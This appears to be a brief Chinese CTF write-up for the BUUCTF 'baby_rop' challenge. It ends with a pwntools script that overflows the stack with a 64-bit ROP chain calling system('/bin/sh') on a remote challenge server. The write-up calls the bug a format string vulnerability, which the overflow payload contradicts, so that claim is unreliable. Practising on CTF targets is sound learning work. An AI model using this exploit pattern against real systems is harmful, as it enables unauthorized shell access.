BUUCTF PWN [HarekazeCTF2019]baby_rop

1.checksec+运行

64位/NX堆栈不可执行

2.IDA进行中

1.main函数

本题函数倒不是很多

很明显,格式化字符串漏洞

2.system bin/sh

3.offset

 

总体来看64位寄存器传参

 

 3.EXP

from pwn import*
 
p=remote('node4.buuoj.cn',27198)
 
shell=0x601048
system=0x400496
rdi=0x400683
 
payload=b'a'*(0x10+8)+p64(rdi)+p64(shell)+p64(system)
 
p.sendline(payload)
p.interactive()

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值